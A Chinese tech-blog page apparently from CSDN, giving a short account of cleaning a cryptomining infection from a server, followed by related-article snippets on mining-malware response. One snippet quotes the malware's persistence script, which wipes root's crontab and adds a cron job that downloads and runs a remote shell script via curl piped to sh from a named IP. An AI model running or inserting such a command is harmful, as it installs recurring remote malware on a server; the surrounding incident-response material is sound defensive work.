挖矿病毒事件

最新推荐文章于 2025-04-14 15:50:46 发布
原创 最新推荐文章于 2025-04-14 15:50:46 发布 · 2.7k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#挖矿病毒

一台服务器发生挖矿病毒事件,现象为CPU达100%,内存剩余少。发现一个诡异IP后,使用lsof查找进程运行文件,解决办法是杀掉进程、删除文件夹,最后提醒找安全部门扫描。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

昨天一台服务器发生挖矿病毒事件,现象是CPU干到100,内存剩余不多。

废话不多说直接贴图,早上时间宝贵

 

发现如上图一个诡异的IP

 

直接使用lsof 查找这个进程运行 的文件在哪,给我拉出来打

解决办法直接把进程kill 掉,然后删除文件夹

别忘记找安全部门扫描一下 

《网络安全自学教程》- 挖矿病毒排查思路和处置步骤
wangyuxiang946的博客
05-05 2万+
首先根据CPU占用率确定确定挖矿进程,找到母体文件并清除。 而后是检查计划任务、启动项中,挖矿木马的持久化操作,杜绝复发。 最后通过账号、日志、母体文件等信息,溯源攻击路径。
linux挖矿病毒分析
清扬叶
04-01 1621
发现问题: 在查询进程端口号占用时,发现查询特别慢,而当时运行的程序又很少,于是执行top命令发现存在一个networkservice进程的cpu占用率超过了100%,如图所示: networkservice和sysupdate都不是我们自己的运行程序,于是百度了一下,发现是linux挖矿病毒。 处理问题: 使用top查询到networkservice和...
挖矿病毒的特点
weixin_47104052的博客
05-04 2054
挖矿病毒的特点: 1、文件/定时任务删除失败-------------------文件只读属性保护 2、文件/定时任务删完又出现-----------------系统文件替换/下载进程残留 3、病毒进程刚刚删完又被拉起---------------恶意进程守护 4、主机严重卡顿但找不到挖矿进程-----------系统命令劫持 5、主机杀干净后一段时间又出现病毒---------ssh&漏洞再次入侵 当服务器中挖矿病毒后,很有可能系统命令被黑客替换,导致执行某系统命令时,有可能执行被黑客注入到服务器
什么是挖矿病毒?
liu854046222的专栏
10-19 3969
挖矿病毒是一种新型的网络威胁,其主要目的是。
挖矿病毒
weixin_34367257的博客
10-28 2157
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root echo "...
挖矿病毒分析(centos7)
ntgengyf的博客
07-25 1225
本次服务器被入侵,被人植入了密钥文件,导致入侵者可以免密登录服务器,在redis中看到了一个很奇怪的key,它的value的意思是一个定时任务通过curl下载某个sh脚本,并执行,看到网上的一位博主,总结的很好,它总结的原因如下。比较有名的挖矿蠕虫病毒,攻击手段为通过redis感染服务器,如果redis的端口为默认的6379且暴露在公网上,且没有设置客户端连接密码认证,很容易感染,这个病毒是分级别的,好在我遇到的是比较简单的,解决方法如下。.相关的代码,查看进程发现果然多了一个redis-cli的进程。
挖矿病毒应急响应处置手册
安全狐
03-21 1049
通常来说,当我们的服务器或PC资源(CPU)使用率接近或超过100%,并持续高居不下导致服务器或PC操作延缓,我们就可以判定被挖矿。常见挖矿其它特征如下:服务器或PC访问过不受信任的地址,这些地址包括:主机、IP、域名。这是由于大部分挖矿都需要从一个不受信任的地址下载初始化程序,而不受信任的来源主要是:第三方情报结构,企业内部历史数据沉淀。服务器或PC新增异常或恶意文件、进程或服务,并且大部分异常文件保存在服务器或PC的TMP目录中。服务器或PC的定时任务发生变更。
centos7挖矿病毒的处理方法
04-12
在处理CentOS 7挖矿病毒时,首先需要识别出挖矿病毒的特征,例如xmrig这类恶意软件可能会导致CPU使用率异常飙升,占用超过100%的CPU资源。挖矿病毒通常会通过自动启动的方式持续运行,即使在用户手动删除相关进程后...
应急响应-挖矿病毒
最新发布
qq_45694932的博客
04-14 328
kill pid -9 如果删不掉检查文件是否加锁 lsattr 、解锁chattr。find / -name 进程名 去查找进程目录。netstat -anpt 查看外部连接。出现服务器卡顿,CPU拉满,网络阻塞。观察网络连接,cpu,gpu的峰值。crontab -l 计划任务查询。top 检查进程信息。
6.挖矿病毒处置.docx
10-27
挖矿病毒处置知识点总结: 1. 挖矿病毒的识别:挖矿病毒主要表现为占用大量CPU资源,通过观察任务管理器中的CPU占用情况,可以快速识别挖矿病毒的活动迹象。一般情况下,如果CPU占用率持续高企,且发现某个进程如...
LifeCalendar
12-18
采用jsp,Java技术编写的一个人生日历,可当日记本、相册、计划簿使用
挖矿病毒分析
热门推荐
LiBai'S BLOG
03-10 1万+
病毒样本 分析样本 要求 确定二进制文件类型 给出钱包地址的 IOC 特征 文件类型:PE64 脱壳 upx.exe -d svhostd.jpg.virus 钱包地址的 IOC 特征 云沙箱自动分析
实战某高校的一次挖矿病毒的应急处置
qq_44433172的博客
09-19 1711
一次加班引发的应急处置的故事
挖矿是程序病毒解决过程
dengshanzhe3Q的博客
12-11 755
现象:cpu 90%以上 处理过程:1.kill -9 pid 删除进程,删除后cpu下去后,又升起 2.怀疑有定时任务启动 :crontab -l 3 .进入 /var/spool/cron/ ,查看存在定时任务 4. ps -ef | grep 'tauafa' 查出所有进...
Linux服务器挖矿病毒处理
自己在学习过程中的总结
06-19 3410
情况说明:挖矿进程被隐藏(CPU占用50%,htop/top却看不到异常进程),结束挖矿进程后马上又会运行起来(crontab -l查看发现没有定时任务)。1.中毒表现 2.解决办法:断网并修改root密码,找出隐藏的挖矿进程,关闭病毒启动服务,杀掉挖矿进程 3. 防止黑客再次入侵:查找异常IP,封禁异常IP,查看是否有陌生公钥。中毒表现:服务器是24核的,前12核的CPU占用一直处于100%,即使重启服务器,马上就会占用12核的CPU,并且系统内存占用也很大。在没有使用软件的情况下,CPU使用率很高。
应急响应-Windows-挖矿病毒
Sgirll的博客
05-14 1760
随着虚拟货币市场的繁荣,挖矿病毒已成为网络安全领域一大挑战。该类病毒利用计算机资源进行加密货币的挖掘,给个人用户和企业网络带来了严重的安全风险。本文将针对挖矿病毒的应急响应和防范措施进行分析和总结。
Wmixml新型挖矿病毒预警,已有企业被成功渗透
梦想之始
06-27 2351
近日,千里目安全实验室EDR安全团队接到某企业反馈,称其内网大量服务器存在挖矿问题,且难以清理干净。经过深入分析,发现这是一种新型的挖矿病毒,属全国首例,其病毒机制与常规挖矿相差很大。 EDR 安全团队在持续追踪后发现了病毒入侵途径,已将此病毒命名为wmixml挖矿病毒,同时制定了详细的应对措施。病毒名称:wmixml病毒性质:新型挖矿病毒影响范围:已发现全国首例查杀难度:极难病毒简介不同于常规挖...
什么是挖矿木马?我想你到现在还不得而知
VN520的博客
03-27 1117
挖矿木马主要就是通过利用各种手段,将挖矿程序植入到用户的计算机中,在用户不知情的情况下,偷偷利用用户的计算机进行执行挖矿功能,从而获取收益。1.用户往往在不注意的时候,下载并运行了来历不明的破解软件或不安全软件;2.用户点击运行了钓鱼邮件中的附件的文件;3.用户没有做好系统及时更新,通过系统漏洞传播;4.用户浏览了植入挖矿脚本的网页,浏览器就解析脚本进行挖矿
解决挖矿病毒(定时任务、计划任务、系统定时器、定时启动、crontab、入侵)
墨痕诉清风的博客
05-15 7648
在阿里云使用redis,开启了6379端口,但是当时并没有对redis的密码进行设置。在晚上一点左右。阿里云给我发短信,告诉我服务器出现紧急安全事件。建议登录云盾-态势感知控制台查看详情和处理。于是早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。解决办法:1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis。
centos挖矿病毒
04-26
CentOS挖矿病毒是一种恶意软件,它会感染CentOS操作系统并利用系统资源进行加密货币的挖矿。这种病毒通常通过网络攻击、恶意软件下载或者潜在的漏洞来传播。 一旦感染,挖矿病毒会在受感染的计算机上运行一个或多个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值